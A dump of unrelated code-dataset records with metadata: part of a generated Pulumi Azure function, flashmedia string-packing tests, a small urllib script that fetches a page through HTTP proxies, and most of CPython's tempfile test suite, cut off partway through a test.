client_cert_mode=self.client_cert_mode,
container_size=self.container_size,
custom_domain_verification_id=self.custom_domain_verification_id,
daily_memory_time_quota=self.daily_memory_time_quota,
default_host_name=self.default_host_name,
enabled=self.enabled,
enabled_host_names=self.enabled_host_names,
host_name_ssl_states=self.host_name_ssl_states,
host_names=self.host_names,
host_names_disabled=self.host_names_disabled,
hosting_environment_profile=self.hosting_environment_profile,
https_only=self.https_only,
hyper_v=self.hyper_v,
id=self.id,
identity=self.identity,
in_progress_operation_id=self.in_progress_operation_id,
is_default_container=self.is_default_container,
is_xenon=self.is_xenon,
kind=self.kind,
last_modified_time_utc=self.last_modified_time_utc,
location=self.location,
max_number_of_workers=self.max_number_of_workers,
name=self.name,
outbound_ip_addresses=self.outbound_ip_addresses,
possible_outbound_ip_addresses=self.possible_outbound_ip_addresses,
redundancy_mode=self.redundancy_mode,
repository_site_name=self.repository_site_name,
reserved=self.reserved,
resource_group=self.resource_group,
scm_site_also_stopped=self.scm_site_also_stopped,
server_farm_id=self.server_farm_id,
site_config=self.site_config,
slot_swap_status=self.slot_swap_status,
state=self.state,
suspended_till=self.suspended_till,
system_data=self.system_data,
tags=self.tags,
target_swap_slot=self.target_swap_slot,
traffic_manager_host_names=self.traffic_manager_host_names,
type=self.type,
usage_state=self.usage_state)
def get_web_app_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSlotResult:
"""
A web app, a mobile app backend, or an API app.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. By default, this API returns the production slot.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20200901:getWebAppSlot', __args__, opts=opts, typ=GetWebAppSlotResult).value
return AwaitableGetWebAppSlotResult(
availability_state=__ret__.availability_state,
client_affinity_enabled=__ret__.client_affinity_enabled,
client_cert_enabled=__ret__.client_cert_enabled,
client_cert_exclusion_paths=__ret__.client_cert_exclusion_paths,
client_cert_mode=__ret__.client_cert_mode,
container_size=__ret__.container_size,
custom_domain_verification_id=__ret__.custom_domain_verification_id,
daily_memory_time_quota=__ret__.daily_memory_time_quota,
default_host_name=__ret__.default_host_name,
enabled=__ret__.enabled,
enabled_host_names=__ret__.enabled_host_names,
host_name_ssl_states=__ret__.host_name_ssl_states,
host_names=__ret__.host_names,
host_names_disabled=__ret__.host_names_disabled,
hosting_environment_profile=__ret__.hosting_environment_profile,
https_only=__ret__.https_only,
hyper_v=__ret__.hyper_v,
id=__ret__.id,
identity=__ret__.identity,
in_progress_operation_id=__ret__.in_progress_operation_id,
is_default_container=__ret__.is_default_container,
is_xenon=__ret__.is_xenon,
kind=__ret__.kind,
last_modified_time_utc=__ret__.last_modified_time_utc,
location=__ret__.location,
max_number_of_workers=__ret__.max_number_of_workers,
name=__ret__.name,
outbound_ip_addresses=__ret__.outbound_ip_addresses,
possible_outbound_ip_addresses=__ret__.possible_outbound_ip_addresses,
redundancy_mode=__ret__.redundancy_mode,
repository_site_name=__ret__.repository_site_name,
reserved=__ret__.reserved,
resource_group=__ret__.resource_group,
scm_site_also_stopped=__ret__.scm_site_also_stopped,
server_farm_id=__ret__.server_farm_id,
site_config=__ret__.site_config,
slot_swap_status=__ret__.slot_swap_status,
state=__ret__.state,
suspended_till=__ret__.suspended_till,
system_data=__ret__.system_data,
tags=__ret__.tags,
target_swap_slot=__ret__.target_swap_slot,
traffic_manager_host_names=__ret__.traffic_manager_host_names,
type=__ret__.type,
usage_state=__ret__.usage_state)
@_utilities.lift_output_func(get_web_app_slot)
def get_web_app_slot_output(name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetWebAppSlotResult]:
"""
A web app, a mobile app backend, or an API app.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. By default, this API returns the production slot.
"""
...
| [
"[email protected]"
] | |
7b7fd334b67b1727da4bdc482d2cdcaadfa4dab1 | 0403dcc7cdf0e8174300569969914e885ebc4a9b | /tests/test_scriptdata_longstring.py | e12af73e657048fee3f976929a27d7d4d20b3bfb | [
"BSD-2-Clause"
] | permissive | chrippa/python-flashmedia | 03ea9029ef51871872c87d26384bf8433d8b165c | f5df4987d6d6661a240756435bb8729f82d8d31f | refs/heads/master | 2021-01-19T19:36:09.256165 | 2013-04-29T10:30:07 | 2013-04-29T10:30:07 | 5,651,549 | 15 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py | # vim: set fileencoding=utf8 :
from __future__ import unicode_literals
from . import with_fd
from flashmedia.types import ScriptDataLongString
ASCII = b"\x00\x00\x00\x03ABC"
ASCII_SIZE = len(ASCII)
UTF8 = b"\x00\x00\x00\t\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa\x9e"
UTF8_SIZE = len(UTF8)
BROKEN_UTF8 = b"\x00\x00\x00\x08\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa"
BROKEN_UTF8_SIZE = len(BROKEN_UTF8)
def test_pack_ascii():
assert ScriptDataLongString("ABC", "ascii") == ASCII
def test_pack_utf8():
assert ScriptDataLongString("日本語") == UTF8
def test_pack_into():
size = ASCII_SIZE + UTF8_SIZE
buf = bytearray(size)
offset = 0
offset = ScriptDataLongString.pack_into(buf, offset, "ABC", "ascii")
offset = ScriptDataLongString.pack_into(buf, offset, "日本語")
assert buf == (ASCII + UTF8)
assert offset == size
def test_size_ascii():
assert ScriptDataLongString.size("ABC", "ascii") == ASCII_SIZE
def test_size_utf8():
assert ScriptDataLongString.size("日本語") == UTF8_SIZE
@with_fd(ASCII)
def test_read_ascii(fd):
assert ScriptDataLongString.read(fd, "ascii") == "ABC"
assert fd.tell() == ASCII_SIZE
@with_fd(UTF8)
def test_read_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本語"
assert fd.tell() == UTF8_SIZE
@with_fd(BROKEN_UTF8)
def test_read_broken_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本"
assert fd.tell() == BROKEN_UTF8_SIZE
def test_unpack_from():
buf = ASCII + UTF8 + BROKEN_UTF8
offset = 0
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "ABC"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本語"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本"
| [
"[email protected]"
] | |
3468f78680d2c6fa3b3616f9121f4dae00214184 | ce55c319f5a78b69fefc63595d433864a2e531b5 | /爬虫知识/爬虫/04day/04-爬取音乐.py | 66b60b9b5ade7ecbd06ebc3bde5dd9fae6443f39 | [] | no_license | Suijng/1809_data | a072c875e8746190e3b715e53f1afe3323f4666b | 45f8a57089f5c30ccc1a3cddb03b76dc95355417 | refs/heads/master | 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 | HTML | UTF-8 | Python | false | false | 360 | py | import urllib.request
proxy={
'http':'61.176.223.7:58822',
'https':'119.102.132.60:31325'
}
handler = urllib.request.ProxyHandler(
proxies=proxy
)
opener = urllib.request.build_opener(handler)
request = urllib.request.Request(url='http://www.xicidaili.com/')
response = opener.open(request)
content = response.read().decode()
print(content) | [
"[email protected]"
] | |
f7d8f662b47b19b1207a866a5facfa1516f5aeb8 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/test/test_tempfile.py | cf2ae080bed9269d4cb4c40d27e964fefb779988 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 41,583 | py | # tempfile.py unit tests.
import tempfile
import errno
import io
import os
import signal
import sys
import re
import warnings
import contextlib
import weakref
import unittest
from test import support, script_helper
if hasattr(os, 'stat'):
import stat
has_stat = 1
else:
has_stat = 0
has_textmode = (tempfile._text_openflags != tempfile._bin_openflags)
has_spawnl = hasattr(os, 'spawnl')
# TEST_FILES may need to be tweaked for systems depending on the maximum
# number of files that can be opened at one time (see ulimit -n)
if sys.platform.startswith('openbsd'):
TEST_FILES = 48
else:
TEST_FILES = 100
# This is organized as one test for each chunk of code in tempfile.py,
# in order of their appearance in the file. Testing which requires
# threads is not done here.
# Common functionality.
class BaseTestCase(unittest.TestCase):
str_check = re.compile(r"^[a-z0-9_-]{8}$")
def setUp(self):
self._warnings_manager = support.check_warnings()
self._warnings_manager.__enter__()
warnings.filterwarnings("ignore", category=RuntimeWarning,
message="mktemp", module=__name__)
def tearDown(self):
self._warnings_manager.__exit__(None, None, None)
def nameCheck(self, name, dir, pre, suf):
(ndir, nbase) = os.path.split(name)
npre = nbase[:len(pre)]
nsuf = nbase[len(nbase)-len(suf):]
# check for equality of the absolute paths!
self.assertEqual(os.path.abspath(ndir), os.path.abspath(dir),
"file '%s' not in directory '%s'" % (name, dir))
self.assertEqual(npre, pre,
"file '%s' does not begin with '%s'" % (nbase, pre))
self.assertEqual(nsuf, suf,
"file '%s' does not end with '%s'" % (nbase, suf))
nbase = nbase[len(pre):len(nbase)-len(suf)]
self.assertTrue(self.str_check.match(nbase),
"random string '%s' does not match ^[a-z0-9_-]{8}$"
% nbase)
class TestExports(BaseTestCase):
def test_exports(self):
# There are no surprising symbols in the tempfile module
dict = tempfile.__dict__
expected = {
"NamedTemporaryFile" : 1,
"TemporaryFile" : 1,
"mkstemp" : 1,
"mkdtemp" : 1,
"mktemp" : 1,
"TMP_MAX" : 1,
"gettempprefix" : 1,
"gettempdir" : 1,
"tempdir" : 1,
"template" : 1,
"SpooledTemporaryFile" : 1,
"TemporaryDirectory" : 1,
}
unexp = []
for key in dict:
if key[0] != '_' and key not in expected:
unexp.append(key)
self.assertTrue(len(unexp) == 0,
"unexpected keys: %s" % unexp)
class TestRandomNameSequence(BaseTestCase):
"""Test the internal iterator object _RandomNameSequence."""
def setUp(self):
self.r = tempfile._RandomNameSequence()
super().setUp()
def test_get_six_char_str(self):
# _RandomNameSequence returns a six-character string
s = next(self.r)
self.nameCheck(s, '', '', '')
def test_many(self):
# _RandomNameSequence returns no duplicate strings (stochastic)
dict = {}
r = self.r
for i in range(TEST_FILES):
s = next(r)
self.nameCheck(s, '', '', '')
self.assertNotIn(s, dict)
dict[s] = 1
def supports_iter(self):
# _RandomNameSequence supports the iterator protocol
i = 0
r = self.r
for s in r:
i += 1
if i == 20:
break
@unittest.skipUnless(hasattr(os, 'fork'),
"os.fork is required for this test")
def test_process_awareness(self):
# ensure that the random source differs between
# child and parent.
read_fd, write_fd = os.pipe()
pid = None
try:
pid = os.fork()
if not pid:
os.close(read_fd)
os.write(write_fd, next(self.r).encode("ascii"))
os.close(write_fd)
# bypass the normal exit handlers- leave those to
# the parent.
os._exit(0)
parent_value = next(self.r)
child_value = os.read(read_fd, len(parent_value)).decode("ascii")
finally:
if pid:
# best effort to ensure the process can't bleed out
# via any bugs above
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
os.close(read_fd)
os.close(write_fd)
self.assertNotEqual(child_value, parent_value)
class TestCandidateTempdirList(BaseTestCase):
    """Test the internal function _candidate_tempdir_list."""

    def test_nonempty_list(self):
        # _candidate_tempdir_list returns a nonempty list of strings
        cand = tempfile._candidate_tempdir_list()

        self.assertFalse(len(cand) == 0)
        for c in cand:
            self.assertIsInstance(c, str)

    def test_wanted_dirs(self):
        # _candidate_tempdir_list contains the expected directories
        # Make sure the interesting environment variables are all set.
        with support.EnvironmentVarGuard() as env:
            for envname in 'TMPDIR', 'TEMP', 'TMP':
                dirname = os.getenv(envname)
                if not dirname:
                    env[envname] = os.path.abspath(envname)

            cand = tempfile._candidate_tempdir_list()

            for envname in 'TMPDIR', 'TEMP', 'TMP':
                dirname = os.getenv(envname)
                # The guard above set each of these, so an unset variable
                # here would mean the environment changed behind our back.
                if not dirname: raise ValueError
                self.assertIn(dirname, cand)

            try:
                dirname = os.getcwd()
            except (AttributeError, OSError):
                dirname = os.curdir

            self.assertIn(dirname, cand)

        # Not practical to try to verify the presence of OS-specific
        # paths in this list.
# We test _get_default_tempdir some more by testing gettempdir.

class TestGetDefaultTempdir(BaseTestCase):
    """Test _get_default_tempdir()."""

    def test_no_files_left_behind(self):
        # _get_default_tempdir probes each candidate directory by
        # creating (and removing) a scratch file; verify the probe files
        # never survive, even when io.open or write() fails mid-probe.
        # use a private empty directory
        with tempfile.TemporaryDirectory() as our_temp_directory:
            # force _get_default_tempdir() to consider our empty directory
            def our_candidate_list():
                return [our_temp_directory]

            with support.swap_attr(tempfile, "_candidate_tempdir_list",
                                   our_candidate_list):
                # verify our directory is empty after _get_default_tempdir()
                tempfile._get_default_tempdir()
                self.assertEqual(os.listdir(our_temp_directory), [])

                def raise_OSError(*args, **kwargs):
                    raise OSError()

                with support.swap_attr(io, "open", raise_OSError):
                    # test again with failing io.open()
                    with self.assertRaises(FileNotFoundError):
                        tempfile._get_default_tempdir()
                    self.assertEqual(os.listdir(our_temp_directory), [])

                open = io.open
                def bad_writer(*args, **kwargs):
                    # Open succeeds but every write() raises, so the probe
                    # file exists briefly and must still be cleaned up.
                    fp = open(*args, **kwargs)
                    fp.write = raise_OSError
                    return fp

                with support.swap_attr(io, "open", bad_writer):
                    # test again with failing write()
                    with self.assertRaises(FileNotFoundError):
                        tempfile._get_default_tempdir()
                    self.assertEqual(os.listdir(our_temp_directory), [])
class TestGetCandidateNames(BaseTestCase):
    """Test the internal function _get_candidate_names."""

    def test_retval(self):
        """The helper hands back a _RandomNameSequence instance."""
        result = tempfile._get_candidate_names()
        self.assertIsInstance(result, tempfile._RandomNameSequence)

    def test_same_thing(self):
        """Repeated calls all share one cached iterator object."""
        first = tempfile._get_candidate_names()
        second = tempfile._get_candidate_names()
        self.assertTrue(first is second)
@contextlib.contextmanager
def _inside_empty_temp_dir():
    """Run the body with tempfile.tempdir pointing at a brand-new empty
    directory, then remove that directory afterwards."""
    scratch = tempfile.mkdtemp()
    try:
        with support.swap_attr(tempfile, 'tempdir', scratch):
            yield
    finally:
        support.rmtree(scratch)
def _mock_candidate_names(*names):
    """Patch tempfile._get_candidate_names so it yields exactly *names*."""
    def fake_candidates():
        return iter(names)
    return support.swap_attr(tempfile,
                             '_get_candidate_names',
                             fake_candidates)
class TestMkstempInner(BaseTestCase):
    """Test the internal function _mkstemp_inner."""

    class mkstemped:
        """Wrap a (fd, name) pair from _mkstemp_inner; close the fd and
        unlink the file when the wrapper is garbage collected."""
        _bflags = tempfile._bin_openflags
        _tflags = tempfile._text_openflags
        # Bound as class attributes so __del__ can still reach them even
        # if the os module's globals have been cleared at shutdown.
        _close = os.close
        _unlink = os.unlink

        def __init__(self, dir, pre, suf, bin):
            if bin: flags = self._bflags
            else:   flags = self._tflags
            (self.fd, self.name) = tempfile._mkstemp_inner(dir, pre, suf, flags)

        def write(self, str):
            os.write(self.fd, str)

        def __del__(self):
            self._close(self.fd)
            self._unlink(self.name)

    def do_create(self, dir=None, pre="", suf="", bin=1):
        # Create one wrapped temp file and validate its generated name.
        if dir is None:
            dir = tempfile.gettempdir()
        file = self.mkstemped(dir, pre, suf, bin)

        self.nameCheck(file.name, dir, pre, suf)
        return file

    def test_basic(self):
        # _mkstemp_inner can create files
        self.do_create().write(b"blat")
        self.do_create(pre="a").write(b"blat")
        self.do_create(suf="b").write(b"blat")
        self.do_create(pre="a", suf="b").write(b"blat")
        self.do_create(pre="aa", suf=".txt").write(b"blat")

    def test_basic_many(self):
        # _mkstemp_inner can create many files (stochastic)
        extant = list(range(TEST_FILES))
        for i in extant:
            extant[i] = self.do_create(pre="aa")

    def test_choose_directory(self):
        # _mkstemp_inner can create files in a user-selected directory
        dir = tempfile.mkdtemp()
        try:
            self.do_create(dir=dir).write(b"blat")
        finally:
            os.rmdir(dir)

    @unittest.skipUnless(has_stat, 'os.stat not available')
    def test_file_mode(self):
        # _mkstemp_inner creates files with the proper mode
        file = self.do_create()
        mode = stat.S_IMODE(os.stat(file.name).st_mode)
        expected = 0o600
        if sys.platform == 'win32':
            # There's no distinction among 'user', 'group' and 'world';
            # replicate the 'user' bits.
            user = expected >> 6
            expected = user * (1 + 8 + 64)
        self.assertEqual(mode, expected)

    @unittest.skipUnless(has_spawnl, 'os.spawnl not available')
    def test_noinherit(self):
        # _mkstemp_inner file handles are not inherited by child processes
        if support.verbose:
            v="v"
        else:
            v="q"

        file = self.do_create()
        self.assertEqual(os.get_inheritable(file.fd), False)
        fd = "%d" % file.fd

        try:
            me = __file__
        except NameError:
            me = sys.argv[0]

        # We have to exec something, so that FD_CLOEXEC will take
        # effect.  The core of this test is therefore in
        # tf_inherit_check.py, which see.
        tester = os.path.join(os.path.dirname(os.path.abspath(me)),
                              "tf_inherit_check.py")

        # On Windows a spawn* /path/ with embedded spaces shouldn't be quoted,
        # but an arg with embedded spaces should be decorated with double
        # quotes on each end
        if sys.platform == 'win32':
            decorated = '"%s"' % sys.executable
            tester = '"%s"' % tester
        else:
            decorated = sys.executable

        retval = os.spawnl(os.P_WAIT, sys.executable, decorated, tester, v, fd)
        # Negative return value means the child died from a signal.
        self.assertFalse(retval < 0,
                         "child process caught fatal signal %d" % -retval)
        self.assertFalse(retval > 0, "child process reports failure %d"%retval)

    @unittest.skipUnless(has_textmode, "text mode not available")
    def test_textmode(self):
        # _mkstemp_inner can create files in text mode
        # A text file is truncated at the first Ctrl+Z byte
        f = self.do_create(bin=0)
        f.write(b"blat\x1a")
        f.write(b"extra\n")
        os.lseek(f.fd, 0, os.SEEK_SET)
        self.assertEqual(os.read(f.fd, 20), b"blat")

    def default_mkstemp_inner(self):
        # Invoke _mkstemp_inner with the module's default arguments.
        return tempfile._mkstemp_inner(tempfile.gettempdir(),
                                       tempfile.template,
                                       '',
                                       tempfile._bin_openflags)

    def test_collision_with_existing_file(self):
        # _mkstemp_inner tries another name when a file with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            (fd1, name1) = self.default_mkstemp_inner()
            os.close(fd1)
            self.assertTrue(name1.endswith('aaa'))

            (fd2, name2) = self.default_mkstemp_inner()
            os.close(fd2)
            self.assertTrue(name2.endswith('bbb'))

    def test_collision_with_existing_directory(self):
        # _mkstemp_inner tries another name when a directory with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            dir = tempfile.mkdtemp()
            self.assertTrue(dir.endswith('aaa'))

            (fd, name) = self.default_mkstemp_inner()
            os.close(fd)
            self.assertTrue(name.endswith('bbb'))
class TestGetTempPrefix(BaseTestCase):
    """Test gettempprefix()."""

    def test_sane_template(self):
        """gettempprefix returns a nonempty prefix string."""
        prefix = tempfile.gettempprefix()
        self.assertIsInstance(prefix, str)
        self.assertTrue(len(prefix) > 0)

    def test_usable_template(self):
        """gettempprefix returns a usable prefix string.

        Create a temp directory while avoiding the prefix, then make a
        file named prefix + 'xxxxxx.xxx' inside it to prove the prefix
        is a legal filename component.
        """
        candidate = tempfile.gettempprefix() + "xxxxxx.xxx"
        scratch = tempfile.mkdtemp(prefix="")
        try:
            candidate = os.path.join(scratch, candidate)
            fd = os.open(candidate, os.O_RDWR | os.O_CREAT)
            os.close(fd)
            os.unlink(candidate)
        finally:
            os.rmdir(scratch)
class TestGetTempDir(BaseTestCase):
    """Test gettempdir()."""

    def test_directory_exists(self):
        # gettempdir returns a directory which exists
        dir = tempfile.gettempdir()
        self.assertTrue(os.path.isabs(dir) or dir == os.curdir,
                        "%s is not an absolute path" % dir)
        self.assertTrue(os.path.isdir(dir),
                        "%s is not a directory" % dir)

    def test_directory_writable(self):
        # gettempdir returns a directory writable by the user
        # sneaky: just instantiate a NamedTemporaryFile, which
        # defaults to writing into the directory returned by
        # gettempdir.
        file = tempfile.NamedTemporaryFile()
        file.write(b"blat")
        file.close()

    def test_same_thing(self):
        # gettempdir always returns the same object
        # (the computed default is cached in tempfile.tempdir).
        a = tempfile.gettempdir()
        b = tempfile.gettempdir()
        self.assertTrue(a is b)

    def test_case_sensitive(self):
        # gettempdir should not flatten its case
        # even on a case-insensitive file system
        case_sensitive_tempdir = tempfile.mkdtemp("-Temp")
        # Clear the cached value so gettempdir() re-reads the environment.
        _tempdir, tempfile.tempdir = tempfile.tempdir, None
        try:
            with support.EnvironmentVarGuard() as env:
                # Fake the first env var which is checked as a candidate
                env["TMPDIR"] = case_sensitive_tempdir
                self.assertEqual(tempfile.gettempdir(), case_sensitive_tempdir)
        finally:
            # Restore the original cache and remove the scratch directory.
            tempfile.tempdir = _tempdir
            support.rmdir(case_sensitive_tempdir)
class TestMkstemp(BaseTestCase):
    """Test mkstemp()."""

    def do_create(self, dir=None, pre="", suf=""):
        """Create one mkstemp file, validate its location and generated
        name, then close and remove it."""
        if dir is None:
            dir = tempfile.gettempdir()
        (fd, path) = tempfile.mkstemp(dir=dir, prefix=pre, suffix=suf)
        (ndir, nbase) = os.path.split(path)
        adir = os.path.abspath(dir)
        self.assertEqual(adir, ndir,
            "Directory '%s' incorrectly returned as '%s'" % (adir, ndir))

        try:
            self.nameCheck(path, dir, pre, suf)
        finally:
            os.close(fd)
            os.unlink(path)

    def test_basic(self):
        """mkstemp can create files with assorted prefixes/suffixes."""
        self.do_create()
        self.do_create(pre="a")
        self.do_create(suf="b")
        self.do_create(pre="a", suf="b")
        self.do_create(pre="aa", suf=".txt")
        self.do_create(dir=".")

    def test_choose_directory(self):
        """mkstemp honours a user-selected directory."""
        workdir = tempfile.mkdtemp()
        try:
            self.do_create(dir=workdir)
        finally:
            os.rmdir(workdir)
class TestMkdtemp(BaseTestCase):
    """Test mkdtemp()."""

    def do_create(self, dir=None, pre="", suf=""):
        # Create one directory, validate its name, and hand it back;
        # the caller is responsible for removing it.
        if dir is None:
            dir = tempfile.gettempdir()
        name = tempfile.mkdtemp(dir=dir, prefix=pre, suffix=suf)

        try:
            self.nameCheck(name, dir, pre, suf)
            return name
        except:
            # Don't leak the directory if the name check fails.
            os.rmdir(name)
            raise

    def test_basic(self):
        # mkdtemp can create directories
        os.rmdir(self.do_create())
        os.rmdir(self.do_create(pre="a"))
        os.rmdir(self.do_create(suf="b"))
        os.rmdir(self.do_create(pre="a", suf="b"))
        os.rmdir(self.do_create(pre="aa", suf=".txt"))

    def test_basic_many(self):
        # mkdtemp can create many directories (stochastic)
        extant = list(range(TEST_FILES))
        try:
            for i in extant:
                extant[i] = self.do_create(pre="aa")
        finally:
            # Entries still holding their original int were never
            # created; only remove the ones replaced with a path.
            for i in extant:
                if(isinstance(i, str)):
                    os.rmdir(i)

    def test_choose_directory(self):
        # mkdtemp can create directories in a user-selected directory
        dir = tempfile.mkdtemp()
        try:
            os.rmdir(self.do_create(dir=dir))
        finally:
            os.rmdir(dir)

    @unittest.skipUnless(has_stat, 'os.stat not available')
    def test_mode(self):
        # mkdtemp creates directories with the proper mode
        dir = self.do_create()
        try:
            mode = stat.S_IMODE(os.stat(dir).st_mode)
            mode &= 0o777 # Mask off sticky bits inherited from /tmp
            expected = 0o700
            if sys.platform == 'win32':
                # There's no distinction among 'user', 'group' and 'world';
                # replicate the 'user' bits.
                user = expected >> 6
                expected = user * (1 + 8 + 64)
            self.assertEqual(mode, expected)
        finally:
            os.rmdir(dir)

    def test_collision_with_existing_file(self):
        # mkdtemp tries another name when a file with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            file = tempfile.NamedTemporaryFile(delete=False)
            file.close()
            self.assertTrue(file.name.endswith('aaa'))
            dir = tempfile.mkdtemp()
            self.assertTrue(dir.endswith('bbb'))

    def test_collision_with_existing_directory(self):
        # mkdtemp tries another name when a directory with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            dir1 = tempfile.mkdtemp()
            self.assertTrue(dir1.endswith('aaa'))
            dir2 = tempfile.mkdtemp()
            self.assertTrue(dir2.endswith('bbb'))
class TestMktemp(BaseTestCase):
    """Test mktemp()."""

    # For safety, all use of mktemp must occur in a private directory.
    # We must also suppress the RuntimeWarning it generates.
    def setUp(self):
        self.dir = tempfile.mkdtemp()
        super().setUp()

    def tearDown(self):
        if self.dir:
            os.rmdir(self.dir)
            self.dir = None
        super().tearDown()

    class mktemped:
        """Create the file named by mktemp() and unlink it when this
        wrapper is garbage collected."""
        # Bound at class level so __del__ works during shutdown.
        _unlink = os.unlink
        _bflags = tempfile._bin_openflags

        def __init__(self, dir, pre, suf):
            self.name = tempfile.mktemp(dir=dir, prefix=pre, suffix=suf)
            # Create the file.  This will raise an exception if it's
            # mysteriously appeared in the meanwhile.
            os.close(os.open(self.name, self._bflags, 0o600))

        def __del__(self):
            self._unlink(self.name)

    def do_create(self, pre="", suf=""):
        # Pick a name inside the private directory and validate it.
        file = self.mktemped(self.dir, pre, suf)

        self.nameCheck(file.name, self.dir, pre, suf)
        return file

    def test_basic(self):
        # mktemp can choose usable file names
        self.do_create()
        self.do_create(pre="a")
        self.do_create(suf="b")
        self.do_create(pre="a", suf="b")
        self.do_create(pre="aa", suf=".txt")

    def test_many(self):
        # mktemp can choose many usable file names (stochastic)
        extant = list(range(TEST_FILES))
        for i in extant:
            extant[i] = self.do_create(pre="aa")

##     def test_warning(self):
##         # mktemp issues a warning when used
##         warnings.filterwarnings("error",
##                                 category=RuntimeWarning,
##                                 message="mktemp")
##         self.assertRaises(RuntimeWarning,
##                           tempfile.mktemp, dir=self.dir)
# We test _TemporaryFileWrapper by testing NamedTemporaryFile.


class TestNamedTemporaryFile(BaseTestCase):
    """Test NamedTemporaryFile()."""

    def do_create(self, dir=None, pre="", suf="", delete=True):
        # Create one NamedTemporaryFile and validate its visible name.
        if dir is None:
            dir = tempfile.gettempdir()
        file = tempfile.NamedTemporaryFile(dir=dir, prefix=pre, suffix=suf,
                                           delete=delete)

        self.nameCheck(file.name, dir, pre, suf)
        return file

    def test_basic(self):
        # NamedTemporaryFile can create files
        self.do_create()
        self.do_create(pre="a")
        self.do_create(suf="b")
        self.do_create(pre="a", suf="b")
        self.do_create(pre="aa", suf=".txt")

    def test_method_lookup(self):
        # Issue #18879: Looking up a temporary file method should keep it
        # alive long enough.
        f = self.do_create()
        wr = weakref.ref(f)
        write = f.write
        write2 = f.write
        del f
        write(b'foo')
        del write
        write2(b'bar')
        del write2
        if support.check_impl_detail(cpython=True):
            # No reference cycle was created.
            self.assertIsNone(wr())

    def test_creates_named(self):
        # NamedTemporaryFile creates files with names
        f = tempfile.NamedTemporaryFile()
        self.assertTrue(os.path.exists(f.name),
                        "NamedTemporaryFile %s does not exist" % f.name)

    def test_del_on_close(self):
        # A NamedTemporaryFile is deleted when closed
        dir = tempfile.mkdtemp()
        try:
            f = tempfile.NamedTemporaryFile(dir=dir)
            f.write(b'blat')
            f.close()
            self.assertFalse(os.path.exists(f.name),
                             "NamedTemporaryFile %s exists after close" % f.name)
        finally:
            os.rmdir(dir)

    def test_dis_del_on_close(self):
        # Tests that delete-on-close can be disabled
        dir = tempfile.mkdtemp()
        tmp = None
        try:
            f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
            tmp = f.name
            f.write(b'blat')
            f.close()
            self.assertTrue(os.path.exists(f.name),
                            "NamedTemporaryFile %s missing after close" % f.name)
        finally:
            if tmp is not None:
                os.unlink(tmp)
            os.rmdir(dir)

    def test_multiple_close(self):
        # A NamedTemporaryFile can be closed many times without error
        f = tempfile.NamedTemporaryFile()
        f.write(b'abc\n')
        f.close()
        f.close()
        f.close()

    def test_context_manager(self):
        # A NamedTemporaryFile can be used as a context manager
        with tempfile.NamedTemporaryFile() as f:
            self.assertTrue(os.path.exists(f.name))
        self.assertFalse(os.path.exists(f.name))
        # Re-entering the context after close must raise ValueError.
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    # How to test the mode and bufsize parameters?
class TestSpooledTemporaryFile(BaseTestCase):
    """Test SpooledTemporaryFile()."""

    def do_create(self, max_size=0, dir=None, pre="", suf=""):
        # Build a spooled file; data stays in memory until max_size
        # bytes have been written, then it "rolls over" to a real file.
        if dir is None:
            dir = tempfile.gettempdir()
        file = tempfile.SpooledTemporaryFile(max_size=max_size, dir=dir, prefix=pre, suffix=suf)

        return file

    def test_basic(self):
        # SpooledTemporaryFile can create files
        f = self.do_create()
        self.assertFalse(f._rolled)
        f = self.do_create(max_size=100, pre="a", suf=".txt")
        self.assertFalse(f._rolled)

    def test_del_on_close(self):
        # A SpooledTemporaryFile is deleted when closed
        dir = tempfile.mkdtemp()
        try:
            f = tempfile.SpooledTemporaryFile(max_size=10, dir=dir)
            self.assertFalse(f._rolled)
            f.write(b'blat ' * 5)
            self.assertTrue(f._rolled)
            filename = f.name
            f.close()
